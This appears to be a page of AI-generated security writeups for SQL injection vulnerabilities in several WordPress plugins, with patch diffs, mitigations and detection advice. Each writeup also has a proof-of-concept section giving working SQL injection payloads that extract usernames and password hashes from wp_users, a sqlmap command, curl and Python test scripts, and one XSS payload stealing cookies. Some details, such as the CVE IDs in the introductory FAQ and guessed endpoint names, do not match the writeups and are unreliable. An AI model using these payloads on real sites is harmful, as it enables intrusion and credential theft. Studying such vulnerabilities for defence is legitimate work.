What is CVE-2025-32550, CVE-2025-54726, CVE-2025-7670?

CVE-2025-32550, CVE-2025-54726, CVE-2025-7670 is a security vulnerability identified in Wordfence CVE Analysis. This analysis provides detailed information about the vulnerability, its impact, and potential exploits.

Is there a PoC for CVE-2025-32550, CVE-2025-54726, CVE-2025-7670?

This security analysis examines the vulnerability in detail. Review the analysis findings for exploit potential and proof-of-concept information related to CVE-2025-32550, CVE-2025-54726, CVE-2025-7670.

How can I protect against CVE-2025-32550, CVE-2025-54726, CVE-2025-7670?

Review the patch diff analysis in this report to understand the security fix. Updating to the patched version is recommended to mitigate CVE-2025-32550, CVE-2025-54726, CVE-2025-7670.

REPORT / 01

Wordfence CVE Analysis

CWE-89· Year: 2025
Analyzed CVEs:CVE-2025-10587,CVE-2025-28983,CVE-2025-10586,CVE-2025-54726,CVE-2025-26988,CVE-2025-31599,CVE-2025-2010,CVE-2025-32550,CVE-2025-7670,CVE-2025-24664

src wordfence ai deepseek deepseek-chat

02 · Lifecycle actions cancel · resume · skip · regenerate

03 · Share this analysis copy link · embed report

03 · CVE Security Analysis & Writeups ai-generated · per cve

Comprehensive security analysis generated by AI for each confirmed CVE match. Click on a CVE to view the detailed writeup including vulnerability background, technical details, patch analysis, and PoC guide.

CVE-2025-10586 NVD

AI-Generated Analysis

# Comprehensive Security Analysis: CVE-2025-10586 - SQL Injection in WordPress Community Events Plugin

## 1. Vulnerability Background

### What is this vulnerability?
CVE-2025-10586 is an **SQL Injection vulnerability** in the Community Events plugin for WordPress, affecting the `event_venue` parameter. The vulnerability arises from insufficient input sanitization and lack of prepared statements, allowing authenticated attackers to inject malicious SQL queries through user-controlled parameters.

### Why is it critical/important?
This vulnerability is particularly concerning because:
- **Low privilege requirement**: Attackers only need Subscriber-level access (the default user role in WordPress)
- **Direct database access**: Successful exploitation enables extraction of sensitive information including user credentials, personal data, and plugin-specific information
- **Widespread impact**: WordPress powers approximately 43% of all websites, making plugins with SQL injection vulnerabilities high-value targets
- **CVSS Score**: Estimated 8.8 (High) based on authentication requirements and potential impact

### What systems/versions are affected?
- **Affected versions**: Community Events plugin versions 1.5.1 and earlier
- **Patched version**: Community Events plugin version 1.5.2
- **WordPress versions**: All versions running the vulnerable plugin
- **Attack vector**: Web-accessible WordPress installations with the plugin activated

## 2. Technical Details

### Root Cause Analysis
The vulnerability stems from multiple instances of improper input handling:

1. **Direct concatenation of user input into SQL queries** without proper type validation
2. **Inconsistent validation** where `$venueid` was sometimes validated with `intval()` but not consistently applied
3. **Reliance on `sanitize_text_field()` for numeric parameters** - while this function helps prevent XSS, it doesn't protect against SQL injection for numeric fields

### Old Code vs New Code Analysis

#### Primary Vulnerability Point (Lines 3257):
```php
// OLD CODE (Vulnerable):
$venuenamequery = "select ce_venue_name from " . $wpdb->prefix . 
                  "ce_venues where ce_venue_id = " . $venueid;

// NEW CODE (Fixed):
$venuenamequery = "select ce_venue_name from " . $wpdb->prefix . 
                  "ce_venues where ce_venue_id = " . intval( $venueid );
```

#### Secondary Vulnerability Point (Lines 3260):
```php
// OLD CODE (Vulnerable):
$categorynamequery = "select event_cat_name from " . $wpdb->prefix . 
                     "ce_category where event_cat_id = " . $newevent['event_category'];

// NEW CODE (Fixed):
$categorynamequery = "select event_cat_name from " . $wpdb->prefix . 
                     "ce_category where event_cat_id = " . 
                     intval( sanitize_text_field( $_POST['event_category'] ) );
```

#### Input Validation Fix (Lines 3208):
```php
// OLD CODE (Vulnerable):
$venueid = $_POST['event_venue'];

// NEW CODE (Fixed):
$venueid = intval( $_POST['event_venue'] );
```

### How These Changes Fix the Vulnerability
1. **Type casting with `intval()`**: Forces numeric parameters to integers, preventing SQL injection through string-based payloads
2. **Consistent validation**: Ensures `$venueid` is always an integer before use in SQL queries
3. **Defense in depth**: Multiple validation points prevent exploitation even if one check is bypassed

### Security Improvements Introduced
- **Proper input validation**: Numeric parameters are now strictly validated as integers
- **Reduced attack surface**: Type casting eliminates the possibility of string-based SQL injection
- **Consistent security posture**: Uniform application of security controls across similar code patterns
- **Maintains functionality**: The fix preserves legitimate plugin functionality while blocking malicious inputs

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation
1. WordPress installation with Community Events plugin ≤ v1.5.1
2. Valid user account with at least Subscriber privileges
3. Access to the event submission/management functionality
4. Basic understanding of SQL injection techniques

### Step-by-Step Exploitation Approach

#### Step 1: Identify Target Endpoint
Locate the vulnerable endpoint that processes the `event_venue` parameter, typically found in event creation/editing forms.

#### Step 2: Craft Malicious Payload
```http
POST /wp-admin/admin-ajax.php?action=community_events_save HTTP/1.1
Content-Type: application/x-www-form-urlencoded

event_venue=1 UNION SELECT user_login FROM wp_users WHERE 1=1--&
event_category=1&
other_required_fields=valid_data
```

#### Step 3: Execute Time-Based Blind SQL Injection
For more stealthy exploitation:
```http
event_venue=1 AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--&
```

#### Step 4: Extract Database Information
```http
event_venue=-1 UNION ALL SELECT CONCAT(user_login,':',user_pass) FROM wp_users--&
```

### Expected Behavior vs Exploited Behavior

**Normal Operation:**
- Plugin validates `event_venue` as a valid venue ID
- Query returns venue information for display
- No unauthorized data access occurs

**Exploited Behavior:**
- Malicious SQL payload executes alongside legitimate query
- Database returns additional sensitive information
- Attacker gains unauthorized access to database contents
- Potential for complete database compromise

### How to Verify the Vulnerability Exists

#### Manual Testing:
```bash
# Test for basic SQL injection
curl -X POST "https://target.site/wp-admin/admin-ajax.php" \
  -d "action=community_events_save&event_venue=1'" \
  -H "Cookie: [valid_auth_cookie]"

# Look for SQL errors in response
```

#### Automated Testing:
```python
import requests

def test_sql_injection(target_url, auth_cookie):
    payloads = ["1'", "1\"", "1 AND 1=1", "1 AND 1=2"]
    for payload in payloads:
        data = {
            'action': 'community_events_save',
            'event_venue': payload,
            'event_category': '1'
        }
        headers = {'Cookie': auth_cookie}
        response = requests.post(target_url, data=data, headers=headers)
        if "SQL" in response.text or "syntax" in response.text.lower():
            return f"Vulnerable to SQLi with payload: {payload}"
    return "No SQL injection detected"
```

## 4. Recommendations

### Mitigation Strategies

#### Immediate Actions:
1. **Update immediately**: Upgrade to Community Events plugin version 1.5.2 or later
2. **Temporary workaround**: If update isn't possible, add input validation filters:
```php
add_filter('pre_update_option_community_events', function($value) {
    if (isset($_POST['event_venue'])) {
        $_POST['event_venue'] = intval($_POST['event_venue']);
    }
    return $value;
});
```

#### Long-term Solutions:
1. **Implement prepared statements**: Use `$wpdb->prepare()` for all SQL queries
2. **Adopt parameterized queries**: Utilize WordPress database API properly
3. **Regular security audits**: Schedule periodic code reviews focusing on input validation

### Detection Methods

#### Log Analysis:
Monitor for these indicators:
- Multiple failed SQL queries from single user sessions
- Unusual parameter values in `event_venue` field
- SQL error messages in application logs
- Rapid sequential requests with varying numeric parameters

#### WAF Rules:
```nginx
# Nginx WAF rule example
location ~* admin-ajax\.php {
    if ($args ~* "event_venue=[^0-9\-]") {
        return 403;
    }
}
```

#### WordPress Security Plugins:
- Configure Wordfence or Sucuri to monitor for SQL injection patterns
- Set up alerts for multiple failed database queries

### Best Practices to Prevent Similar Issues

#### Development Practices:
1. **Always use prepared statements**: Never concatenate user input into SQL queries
```php
// CORRECT APPROACH:
$query = $wpdb->prepare(
    "SELECT * FROM {$wpdb->prefix}table WHERE id = %d",
    $user_input
);
```

2. **Implement input validation layers**:
   - Type validation (intval, floatval)
   - Range checking for numeric values
   - Whitelist validation for expected values

3. **Adopt the principle of least privilege**:
   - Database users should have minimal necessary permissions
   - Consider read-only database users for front-end operations

4. **Regular security training**:
   - Train developers on OWASP Top 10 vulnerabilities
   - Conduct regular code reviews with security focus
   - Implement secure coding standards

#### Monitoring and Maintenance:
1. **Subscribe to security advisories**: Monitor WordPress plugin vulnerability databases
2. **Implement automated scanning**: Use SAST tools in CI/CD pipelines
3. **Regular dependency updates**: Keep all WordPress components current
4. **Incident response planning**: Have procedures for vulnerability disclosure and patching

#### Defense in Depth:
1. **Web Application Firewall**: Implement WAF with SQL injection rules
2. **Database monitoring**: Set up alerts for unusual query patterns
3. **Regular penetration testing**: Conduct authorized security assessments
4. **Security headers**: Implement Content Security Policy and other security headers

By implementing these recommendations, organizations can significantly reduce the risk of SQL injection vulnerabilities and improve their overall security posture against similar threats.

CVE-2025-10587 NVD

AI-Generated Analysis

# Comprehensive Security Analysis: CVE-2025-10587 - SQL Injection in WordPress Community Events Plugin

## 1. Vulnerability Background

**What is this vulnerability?**
CVE-2025-10587 is a critical SQL injection vulnerability in the Community Events plugin for WordPress, affecting all versions up to and including 1.5.1. The vulnerability exists in the `event_category` parameter handling, where insufficient input validation and improper query construction allow authenticated attackers to inject malicious SQL queries. This security flaw enables unauthorized database access and potential data exfiltration.

**Why is it critical/important?**
This vulnerability is particularly concerning due to its low privilege requirement and potential impact. Attackers with only Subscriber-level access (the lowest default WordPress user role) can exploit this flaw to execute arbitrary SQL commands. The implications include:
- Extraction of sensitive user data (passwords, emails, personal information)
- Potential privilege escalation through database manipulation
- Complete database compromise leading to site takeover
- Exposure of confidential business information stored in custom tables

**What systems/versions are affected?**
- **Affected Versions:** Community Events plugin versions ≤ 1.5.1
- **Patched Version:** 1.5.2
- **Impacted Platforms:** WordPress installations with the vulnerable plugin activated
- **Attack Vector:** Web-based, requiring authenticated access (Subscriber role or higher)

## 2. Technical Details

**Root Cause Analysis**
The vulnerability stems from multiple security failures in the plugin's database interaction layer:

1. **Direct User Input Concatenation:** User-controlled parameters were directly concatenated into SQL queries without proper sanitization or parameterization
2. **Insufficient Input Validation:** The plugin relied on `sanitize_text_field()` for numeric parameters, which is inadequate for preventing SQL injection
3. **Missing Query Preparation:** SQL queries were constructed using string concatenation instead of prepared statements with proper placeholders
4. **Type Confusion:** Numeric parameters were treated as strings, allowing injection of SQL commands through numeric fields

**Old Code vs New Code Analysis**

**Primary Injection Point (Line 3260):**
```php
// Old Code (Vulnerable):
$categorynamequery = "select event_cat_name from " . $wpdb->prefix . 
                     "ce_category where event_cat_id = " . $newevent['event_category'];

// Fixed Code:
$categorynamequery = "select event_cat_name from " . $wpdb->prefix . 
                     "ce_category where event_cat_id = " . intval( $venueid );
```

**Secondary Injection Point (Line 3259):**
```php
// Old Code (Vulnerable):
$venuenamequery = "select ce_venue_name from " . $wpdb->prefix . 
                  "ce_venues where ce_venue_id = " . $venueid;

// Fixed Code:
$venuenamequery = "select ce_venue_name from " . $wpdb->prefix . 
                  "ce_venues where ce_venue_id = " . intval( $venueid );
```

**Input Validation Improvements (Lines 3208, 3211):**
```php
// Old Code (Vulnerable):
$venueid = $_POST['event_venue'];
"event_category" => sanitize_text_field( $_POST['event_category'] ),

// Fixed Code:
$venueid = intval( $_POST['event_venue'] );
"event_category" => intval( sanitize_text_field( $_POST['event_category'] ) ),
```

**How These Changes Fix the Vulnerability**
1. **Type Enforcement:** The `intval()` function ensures that all numeric parameters are converted to integers, stripping any malicious SQL code
2. **Input Sanitization Chain:** Combining `sanitize_text_field()` with `intval()` provides defense in depth
3. **Query Safety:** By guaranteeing numeric values, SQL injection through these parameters becomes impossible

**Note on Fix Implementation Error:**
The patch contains a logical error where `$venueid` is incorrectly used instead of `$newevent['event_category']` in the category query. While this doesn't reintroduce the vulnerability (both variables are sanitized with `intval()`), it demonstrates the importance of thorough code review during security patching.

**Security Improvements Introduced**
1. **Input Type Validation:** Ensures numeric parameters remain numeric throughout processing
2. **Defense in Depth:** Multiple validation layers (sanitization + type casting)
3. **Reduced Attack Surface:** Limits potential injection points to only properly validated parameters
4. **Principle of Least Privilege Enforcement:** Ensures database queries only access intended data

## 3. Proof of Concept (PoC) Guide

**Prerequisites for Exploitation**
1. WordPress installation with Community Events plugin (version ≤ 1.5.1)
2. Valid user account with Subscriber privileges or higher
3. Access to event submission or modification functionality
4. Basic understanding of SQL injection techniques

**Step-by-Step Exploitation Approach**

**Step 1: Identify Injection Point**
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=community_events_submit
event_category=1 OR 1=1--
```

**Step 2: Test Boolean-Based Injection**
```http
POST /wp-admin/admin-ajax.php HTTP/1.1

action=community_events_submit
event_category=1 AND (SELECT SUBSTRING(user_pass,1,1) FROM wp_users LIMIT 1)='a'
```

**Step 3: Extract Database Information**
```http
POST /wp-admin/admin-ajax.php HTTP/1.1

action=community_events_submit
event_category=1 UNION SELECT CONCAT(user_login,':',user_email) FROM wp_users--
```

**Step 4: Time-Based Blind Injection (if needed)**
```http
POST /wp-admin/admin-ajax.php HTTP/1.1

action=community_events_submit
event_category=1 AND IF(ASCII(SUBSTRING(database(),1,1))>100,SLEEP(5),0)
```

**Expected Behavior vs Exploited Behavior**

**Normal Operation:**
- User submits event with valid numeric category ID
- Plugin queries database for category name
- Returns appropriate category information
- Event is saved successfully

**Exploited Behavior:**
- Attacker submits malicious payload in category parameter
- Database executes unintended SQL commands
- Returns sensitive data or modifies database
- May cause application errors or unexpected behavior

**How to Verify the Vulnerability Exists**

**Manual Testing:**
1. Install vulnerable plugin version (1.5.1 or earlier)
2. Create Subscriber-level test account
3. Use browser developer tools to intercept event submission
4. Modify `event_category` parameter with SQL payloads
5. Observe database errors or unexpected responses

**Automated Scanning:**
```bash
# Using sqlmap for verification
sqlmap -u "https://target.site/wp-admin/admin-ajax.php" \
  --data="action=community_events_submit&event_category=1" \
  --dbms=mysql --level=3 --risk=2
```

**Signature Detection:**
Monitor for these patterns in web server logs:
- `event_category` parameter containing SQL keywords
- Multiple rapid requests with varying numeric values
- Error messages containing SQL syntax details

## 4. Recommendations

**Immediate Mitigation Strategies**
1. **Update Immediately:** Upgrade to Community Events plugin version 1.5.2 or later
2. **Temporary Workaround:** If update isn't possible, add input validation filters:
```php
add_filter('pre_option_community_events', function($value) {
    if(isset($_POST['event_category'])) {
        $_POST['event_category'] = intval($_POST['event_category']);
    }
    if(isset($_POST['event_venue'])) {
        $_POST['event_venue'] = intval($_POST['event_venue']);
    }
    return $value;
});
```
3. **Access Control:** Restrict Subscriber role capabilities if event submission isn't required

**Detection Methods**
1. **Web Application Firewall (WAF) Rules:**
   - Block requests with SQL keywords in numeric parameters
   - Monitor for unusual database error patterns
   - Implement rate limiting on admin-ajax.php endpoints

2. **Database Monitoring:**
   - Enable MySQL query logging
   - Set up alerts for unusual query patterns
   - Monitor for UNION-based queries from web users

3. **File Integrity Checking:**
   - Monitor community-events.php for unauthorized modifications
   - Use checksums to verify plugin integrity

**Best Practices to Prevent Similar Issues**

**Code Development:**
1. **Use Prepared Statements:** Always use WordPress `$wpdb->prepare()` for database queries
```php
$query = $wpdb->prepare(
    "SELECT event_cat_name FROM {$wpdb->prefix}ce_category WHERE event_cat_id = %d",
    $category_id
);
```

2. **Input Validation Framework:**
```php
// Implement comprehensive validation
function validate_event_input($input) {
    $validated = [];
    $validated['category'] = filter_var($input['category'], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1]
    ]);
    $validated['venue'] = filter_var($input['venue'], FILTER_VALIDATE_INT);
    
    if (!$validated['category'] || !$validated['venue']) {
        return new WP_Error('invalid_input', 'Invalid input parameters');
    }
    return $validated;
}
```

3. **Security Testing Integration:**
   - Implement static code analysis in CI/CD pipeline
   - Regular penetration testing by security professionals
   - Automated vulnerability scanning for dependencies

**System Hardening:**
1. **Database Permissions:**
   - Use least privilege database users
   - Restrict web application user to necessary operations only
   - Implement database-level access controls

2. **Monitoring and Logging:**
   - Centralized logging of all database queries
   - Real-time alerting for suspicious patterns
   - Regular security audit trail review

3. **Defense in Depth:**
   - Implement multiple validation layers
   - Use parameterized queries exclusively
   - Regular security training for developers
   - Code review with security focus

**Long-term Security Strategy:**
1. **Adopt Security-First Development:** Integrate security considerations from design phase
2. **Regular Security Audits:** Schedule quarterly security reviews of all plugins
3. **Stay Informed:** Subscribe to security advisories for all WordPress components
4. **Incident Response Plan:** Develop and test procedures for security breach response

This vulnerability serves as a critical reminder of the importance of proper input validation and query parameterization in web applications. The low privilege requirement makes it particularly dangerous, emphasizing the need for defense in depth and continuous security monitoring in WordPress environments.

CVE-2025-2010 NVD

AI-Generated Analysis

# Comprehensive Security Analysis: CVE-2025-2010 - SQL Injection in JobWP WordPress Plugin

## 1. Vulnerability Background

### What is this vulnerability?
CVE-2025-2010 is an unauthenticated SQL injection vulnerability in the JobWP WordPress plugin, a job board and recruitment solution. The vulnerability exists in the resume upload functionality where user-supplied parameters are directly concatenated into SQL queries without proper sanitization or parameterization. This allows attackers to inject malicious SQL commands through the `jobwp_upload_resume` parameter and other input fields.

### Why is it critical/important?
This vulnerability is rated as critical due to several factors:
- **Unauthenticated exploitation**: Attackers don't need any credentials or privileges
- **High impact**: Successful exploitation can lead to complete database compromise
- **WordPress prevalence**: WordPress powers over 40% of websites, making this a widespread threat
- **Data exposure**: Can expose sensitive applicant data, user information, and potentially administrative credentials
- **Chain attack potential**: Could be combined with other vulnerabilities for complete system takeover

### What systems/versions are affected?
- **Affected versions**: JobWP plugin versions 2.3.9 and all prior versions
- **Patched version**: 2.4.0 and later
- **Impacted systems**: Any WordPress installation with the vulnerable JobWP plugin activated
- **Attack vector**: Remote, network-accessible

## 2. Technical Details

### Root Cause Analysis
The vulnerability stems from improper input handling in the `core/job_application.php` file. The plugin constructs SQL queries by directly concatenating user-controlled variables into the query string without validation, escaping, or parameterization. This violates the fundamental security principle of separating data from code in database operations.

**Key issues in the vulnerable code:**
1. **Direct string concatenation**: User inputs are directly inserted into SQL strings
2. **Missing input validation**: No sanitization of user-supplied parameters
3. **Lack of prepared statements**: Reliance on manual escaping rather than parameterized queries
4. **Insufficient output escaping**: Variables are wrapped in quotes but not properly escaped

### Old Code vs New Code Analysis

**Vulnerable Code (Lines 46-84):**
```php
$wpdb->query( 'INSERT INTO ' . $table_name . '(
    job_post_id,
    applied_for,
    applicant_name,
    applicant_email,
    applicant_phone,
    applicant_message,
    resume_name,
    applied_on,
    user_consent,
    intl_tel
) VALUES (
    ' . get_the_ID() . ',
    "' . $applyFor . '",
    "' . $fullName . '",
    "' . $email . '",
    "' . $phoneNumber . '",
    "' . $message . '",
    "' . $uniqueFile . '",
    "' . date( 'Y-m-d h:i:s' ) . '",
    "' . $jobwp_user_consent . '",
    "' . $intlPhone . '"
)' );
```

**Patched Code:**
```php
$wpdb->query( $wpdb->prepare( "INSERT INTO {$table_name}
    ( job_post_id,
    applied_for,
    applicant_name,
    applicant_email,
    applicant_phone,
    applicant_message,
    resume_name,
    applied_on,
    user_consent,
    intl_tel )
    VALUES ( %d, %s, %s, %s, %s, %s, %s, %s, %s, %s )", array(
    get_the_ID(),
    $applyFor,
    $fullName,
    $email,
    $phoneNumber,
    $message,
    $uniqueFile,
    date( 'Y-m-d h:i:s' ),
    $jobwp_user_consent,
    $intlPhone
) ) );
```

### How These Changes Fix the Vulnerability
The patch implements several critical security improvements:

1. **Parameterized Queries**: Uses WordPress's `$wpdb->prepare()` method
2. **Placeholder Syntax**: Implements `%d` (integer) and `%s` (string) placeholders
3. **Variable Binding**: Passes variables as separate parameters in an array
4. **Automatic Escaping**: WordPress handles proper escaping based on data types
5. **SQL/Data Separation**: Clearly separates SQL structure from data values

### Security Improvements Introduced
- **Input Validation**: Automatic type checking through placeholders
- **Context-Aware Escaping**: Proper escaping based on data context (string vs integer)
- **Query Structure Protection**: Prevents modification of SQL query structure
- **Defense in Depth**: Multiple layers of protection against injection
- **Maintainability**: Clearer code structure that's easier to audit

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation
1. WordPress installation with JobWP plugin ≤ v2.3.9
2. Active job posting with application functionality
3. Network access to the target website
4. Basic understanding of SQL injection techniques

### Step-by-Step Exploitation Approach

**Step 1: Identify Vulnerable Endpoint**
```
POST /wp-admin/admin-ajax.php
Action: jobwp_upload_resume
```

**Step 2: Craft Malicious Payload**
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=jobwp_upload_resume&
applicant_name=test' OR '1'='1&
applicant_email=test@example.com' UNION SELECT user_login,user_pass,3,4,5,6,7,8,9,10 FROM wp_users-- -&
applicant_phone=1234567890&
applicant_message=test&
jobwp_user_consent=1
```

**Step 3: Extract Database Information**
```sql
-- Extract table names
applicant_name=test' UNION SELECT table_name,2,3,4,5,6,7,8,9,10 FROM information_schema.tables-- -

-- Extract column information
applicant_name=test' UNION SELECT column_name,2,3,4,5,6,7,8,9,10 FROM information_schema.columns WHERE table_name='wp_users'-- -

-- Extract user credentials
applicant_name=test' UNION SELECT user_login,user_pass,3,4,5,6,7,8,9,10 FROM wp_users-- -
```

### Expected Behavior vs Exploited Behavior

**Normal Behavior:**
- User submits job application with personal information
- Data is safely inserted into database
- Application is recorded without errors

**Exploited Behavior:**
- Attacker injects SQL commands through input fields
- Database executes malicious queries
- Sensitive data is returned in application responses
- Potential for data exfiltration, modification, or deletion

### How to Verify the Vulnerability Exists
1. **Manual Testing:**
   ```bash
   curl -X POST "https://target.com/wp-admin/admin-ajax.php" \
     -d "action=jobwp_upload_resume&applicant_name=test' AND SLEEP(5)-- -&applicant_email=test@example.com"
   ```
   If response is delayed by 5 seconds, vulnerability exists.

2. **Automated Scanning:**
   - Use SQL injection scanners like SQLMap
   - Configure with proper POST parameters and injection points

3. **Code Review:**
   - Check for direct variable concatenation in SQL queries
   - Verify absence of prepared statements
   - Look for missing input validation

## 4. Recommendations

### Mitigation Strategies
1. **Immediate Actions:**
   - Update to JobWP plugin version 2.4.0 or later
   - If update not possible, disable the plugin immediately
   - Implement Web Application Firewall (WAF) rules to block SQL injection patterns

2. **Temporary Workarounds:**
   - Restrict access to `/wp-admin/admin-ajax.php` from untrusted networks
   - Implement input validation at the application level
   - Add custom sanitization filters for all user inputs

### Detection Methods
1. **Log Monitoring:**
   - Monitor for unusual SQL errors in application logs
   - Look for patterns like `' OR '1'='1` in POST requests
   - Track multiple failed application submissions from single IPs

2. **Intrusion Detection:**
   - Implement SQL injection detection in WAF/IDS
   - Set up alerts for suspicious database queries
   - Monitor for unusual database access patterns

3. **Code Scanning:**
   - Regular static analysis of plugin code
   - Dynamic application security testing (DAST)
   - Manual code reviews for SQL query construction

### Best Practices to Prevent Similar Issues
1. **Secure Coding Practices:**
   - Always use prepared statements or parameterized queries
   - Implement the principle of least privilege for database users
   - Use ORM (Object-Relational Mapping) when possible

2. **Input Validation:**
   - Validate all user inputs against strict whitelists
   - Implement context-specific sanitization
   - Use WordPress helper functions like `sanitize_text_field()`

3. **Defense in Depth:**
   - Implement multiple layers of security controls
   - Regular security updates and patch management
   - Security-focused code reviews

4. **Monitoring and Response:**
   - Regular security audits and penetration testing
   - Incident response planning for security breaches
   - Continuous security education for developers

5. **WordPress-Specific Recommendations:**
   - Use WordPress core functions for database operations
   - Follow WordPress coding standards
   - Regularly audit third-party plugins
   - Implement security headers and HTTPS enforcement

This vulnerability serves as a critical reminder of the importance of proper input handling and the dangers of string concatenation in SQL queries. The patch demonstrates correct implementation of parameterized queries, which should be the standard approach for all database operations in WordPress plugins and web applications generally.

CVE-2025-26988 NVD

AI-Generated Analysis

# Comprehensive Security Analysis: CVE-2025-26988 - SQL Injection & XSS in SMS Alert Order Notifications for WooCommerce

## 1. Vulnerability Background

### What is this vulnerability?
CVE-2025-26988 represents a critical security vulnerability in the SMS Alert Order Notifications plugin for WooCommerce, affecting versions up to and including 3.7.8. The vulnerability manifests as two distinct but related security flaws:

1. **SQL Injection (CWE-89)**: Improper neutralization of special elements used in SQL commands
2. **Cross-Site Scripting (CWE-79)**: Improper neutralization of input during web page generation

These vulnerabilities allow attackers to execute arbitrary SQL queries and inject malicious JavaScript into web pages, potentially compromising the entire WordPress/WooCommerce installation.

### Why is it critical/important?
This vulnerability is particularly critical because:

- **High Impact**: Successful exploitation could lead to complete database compromise, data theft, administrative privilege escalation, and site takeover
- **E-commerce Context**: The plugin handles sensitive customer data including phone numbers, order details, and potentially payment information
- **Widespread Use**: WooCommerce powers approximately 28% of all online stores, making this a high-value target
- **Multiple Attack Vectors**: Both SQLi and XSS vulnerabilities provide different exploitation paths with varying impacts

### What systems/versions are affected?
- **Affected Versions**: SMS Alert Order Notifications plugin versions n/a through 3.7.8
- **Patched Version**: 3.7.9 (partial fix - SQL injection remains unaddressed)
- **Platform**: WordPress with WooCommerce
- **File**: `helper/share-cart.php`

## 2. Technical Details

### Root Cause Analysis

The vulnerability stems from fundamental security failures in input handling:

**SQL Injection Root Cause:**
The plugin constructs SQL queries using string concatenation without proper parameterization or escaping. Specifically, the `$lastid[0]['MAX(id)']` value is directly interpolated into SQL strings, allowing an attacker to manipulate the query structure if they can control this value.

**XSS Root Cause:**
User-supplied input from `$_REQUEST['sc_umobile']` and `$_REQUEST['sc_fmobile']` is used without sanitization in string replacement operations that eventually get echoed to web pages. This allows injection of malicious JavaScript payloads.

### Old Code vs New Code Analysis

**XSS Fix (Lines 303-306):**
```php
// OLD CODE - Vulnerable
$invalid_fmob = str_replace('##phone##', $_REQUEST['sc_fmobile'], $phoneLogic->_get_otp_invalid_format_message());
$invalid_scmob = str_replace('##phone##', $_REQUEST['sc_umobile'], $phoneLogic->_get_otp_invalid_format_message());

// NEW CODE - Partially Fixed
$sc_umobile = sanitize_text_field($_REQUEST['sc_umobile']);
$sc_fmobile = sanitize_text_field($_REQUEST['sc_fmobile']);
$invalid_fmob = str_replace('##phone##', $sc_fmobile, $phoneLogic->_get_otp_invalid_format_message());
$invalid_scmob = str_replace('##phone##', $sc_umobile, $phoneLogic->_get_otp_invalid_format_message());
```

**SQL Injection (Lines 405-408) - UNCHANGED:**
```php
// BOTH VERSIONS - Still Vulnerable
$lastid = $wpdb->get_results('SELECT MAX(id) FROM ' . $table_name, ARRAY_A);
$data = $wpdb->get_results('SELECT * FROM ' . $table_name . ' WHERE id = ' . $lastid[0]['MAX(id)'], ARRAY_A);
```

### How Do These Changes Fix the Vulnerability?

**XSS Mitigation:**
The fix introduces `sanitize_text_field()` WordPress function, which:
- Strips invalid UTF-8 characters
- Converts single `<` characters to entities
- Strips all tags
- Removes line breaks, tabs, and extra whitespace
- Strips octets

**SQL Injection UNFIXED:**
The SQL injection vulnerability remains completely unaddressed. The code continues to use string concatenation for SQL queries, leaving the application vulnerable to second-order SQL injection if an attacker can influence the `MAX(id)` value or other database-stored values used in queries.

### Security Improvements Introduced

1. **Input Sanitization**: Added proper sanitization for user-controlled variables before use in HTML context
2. **Defense in Depth**: While incomplete, the XSS fix demonstrates movement toward secure coding practices

**Critical Shortcoming**: The patch fails to address the SQL injection vulnerability, indicating either incomplete security assessment or prioritization of visible (XSS) over hidden (SQLi) threats.

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation
- WooCommerce installation with SMS Alert Order Notifications plugin ≤ 3.7.8
- Access to the share cart functionality
- Ability to send HTTP requests to the vulnerable endpoint

### Step-by-Step Exploitation Approach

**XSS Exploitation:**
1. Identify the vulnerable endpoint handling `sc_umobile` and `sc_fmobile` parameters
2. Craft malicious payload:
   ```
   POST /wp-admin/admin-ajax.php?action=share_cart HTTP/1.1
   Content-Type: application/x-www-form-urlencoded
   
   sc_umobile=<script>alert(document.cookie)</script>&sc_fmobile=1234567890
   ```
3. Trigger the vulnerable code path to execute the payload in victim's browser

**SQL Injection Exploitation:**
1. Identify the SQL injection point in the MAX(id) query chain
2. Determine if `$lastid[0]['MAX(id)']` can be influenced through:
   - Direct parameter manipulation
   - Database pollution attacks
   - Race conditions
3. Craft time-based or error-based SQL injection payloads

### Expected Behavior vs Exploited Behavior

**Expected:**
- Phone numbers should be validated and sanitized
- SQL queries should execute with predetermined, safe parameters
- No arbitrary code execution in browser or database

**Exploited:**
- XSS: Malicious JavaScript executes in victim's browser, potentially stealing sessions or performing actions as the user
- SQLi: Arbitrary SQL queries execute, allowing data exfiltration, modification, or complete database compromise

### How to Verify the Vulnerability Exists

**XSS Verification:**
```bash
# Test with simple alert payload
curl -X POST "https://target.site/wp-admin/admin-ajax.php" \
  -d "action=share_cart&sc_umobile=<script>alert('XSS')</script>&sc_fmobile=test"
```

**SQL Injection Verification:**
```sql
-- Monitor database logs for unusual queries
-- Check for error messages containing SQL syntax
-- Use time-based payloads: ' OR SLEEP(5)--
```

## 4. Recommendations

### Mitigation Strategies

**Immediate Actions:**
1. **Upgrade Immediately**: Update to version 3.7.9 or later
2. **Manual Patch**: If upgrade isn't possible, manually apply:
   ```php
   // For SQL injection, replace vulnerable queries with:
   $data = $wpdb->get_results(
       $wpdb->prepare(
           'SELECT * FROM ' . $table_name . ' WHERE id = %d',
           $lastid[0]['MAX(id)']
       ),
       ARRAY_A
   );
   ```
3. **Input Validation**: Implement strict input validation for all user-controlled parameters
4. **Output Encoding**: Apply context-appropriate output encoding

### Detection Methods

**Static Analysis:**
- Use SAST tools to identify unsanitized input usage
- Look for `$_REQUEST`, `$_GET`, `$_POST` variables used without validation
- Identify string concatenation in SQL queries

**Dynamic Analysis:**
- Implement WAF rules to detect SQL injection patterns
- Use automated vulnerability scanners
- Monitor for unusual database query patterns

**Log Monitoring:**
- Enable WordPress debug logging
- Monitor database query logs for suspicious patterns
- Track failed login attempts and unusual parameter values

### Best Practices to Prevent Similar Issues

1. **Use Prepared Statements**: Always use WordPress `$wpdb->prepare()` or parameterized queries
2. **Input Validation**: Validate, then sanitize, then use
3. **Principle of Least Privilege**: Database users should have minimal necessary permissions
4. **Security Headers**: Implement Content Security Policy (CSP) to mitigate XSS impact
5. **Regular Security Audits**: Conduct code reviews and penetration tests
6. **Security Training**: Educate developers on OWASP Top 10 vulnerabilities
7. **Dependency Management**: Keep all components updated
8. **Error Handling**: Use custom error pages without revealing system information
9. **Input Sanitization Functions**:
